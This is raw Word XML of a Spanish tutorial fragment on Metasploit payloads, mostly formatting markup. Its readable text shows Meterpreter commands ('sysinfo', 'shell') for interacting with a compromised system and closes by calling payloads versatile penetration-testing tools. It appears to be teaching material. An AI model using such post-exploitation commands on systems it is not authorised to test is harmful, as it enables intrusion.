        <w:t>, puedes interactuar con el sistema objetivo usando una serie de comandos avanzados. Por ejemplo:</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bash</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Copy code</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meterpreter &gt; sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="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A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>meterpreter &gt; shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A7003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A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>Conclusión</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A7003D">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"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Los payloads en Metasploit son herramientas poderosas y versátiles que permiten realizar una amplia gama de acciones en los sistemas objetivos. La elección del payload adecuado depende del objetivo específico de la prueba de penetración y de la plataforma del sistema comprometido.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7003D" w:rsidRPr="00A7003D" w:rsidRDefault="00A7003D" w:rsidP="00A7003D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A7003D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>4o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB2342" w:rsidRDefault="00A7003D">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06A56"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8B2A4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BD0DB4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E2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3375F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E47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E77032"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FC2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7D5AE1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6B76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7E1F78"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0F98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A45"/>
    <w:rsid w:val="00075EE0"/>
    <w:rsid w:val="003C5A45"/>
    <w:rsid w:val="00A7003D"/>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7003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A7003D"/>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003D"/>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A7003D"/>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A7003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003D"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CdigoHTML">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A7003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7003D"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="es-CL"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-builtin">
    <w:name w:val="hljs-built_in"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00A7003D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="line-clamp-1">
    <w:name w:val="line-clamp-1"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00A70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7003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A7003D"/>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003D"/>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A7003D"/>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A7003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003D"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CdigoHTML">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A7003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7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7003D"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="es-CL"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-builtin">
    <w:name w:val="hljs-built_in"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00A7003D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="line-clamp-1">
    <w:name w:val="line-clamp-1"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00A70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11038">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="360864528">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="388303356">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1216508293">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="897935669">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="1878590130">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="4289667">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="565383906">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                </w:div>
                              </w:divsChild>
                            </w:div>
                            <w:div w:id="1652520964">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                            </w:div>
                          </w:divsChild>
                        </w:div>
                        <w:div w:id="1195970723">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="723873427">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="1778871034">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                </w:div>
                              </w:divsChild>
                            </w:div>
                            <w:div w:id="512844752">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                            </w:div>
                          </w:divsChild>
                        </w:div>
                        <w:div w:id="603999699">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="799500091">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="1198347905">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                </w:div>
                              </w:divsChild>
                            </w:div>
                            <w:div w:id="1502283150">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                            </w:div>
                          </w:divsChild>
                        </w:div>
                        <w:div w:id="182597081">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="1815027506">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="1180503901">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                </w:div>
                              </w:divsChild>
                            </w:div>
                            <w:div w:id="1072855192">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                            </w:div>
                          </w:divsChild>
                        </w:div>
                        <w:div w:id="1053696238">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="2088382658">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="1467118873">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                </w:div>
                              </w:divsChild>
                            </w:div>
                            <w:div w:id="141503035">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                            </w:div>
                          </w:divsChild>
                        </w:div>
                        <w:div w:id="1125192790">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="1721200773">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="1250390507">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                </w:div>
                              </w:divsChild>
                            </w:div>
                            <w:div w:id="1235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26699">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="456265433">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="893004016">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="4546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3247</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>27</Lines>
  <Paragraphs>7</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>Luffi</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2024-07-11T07:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-11T07:51:00Z</dcterms:modified>
</cp:coreProperties>
</file>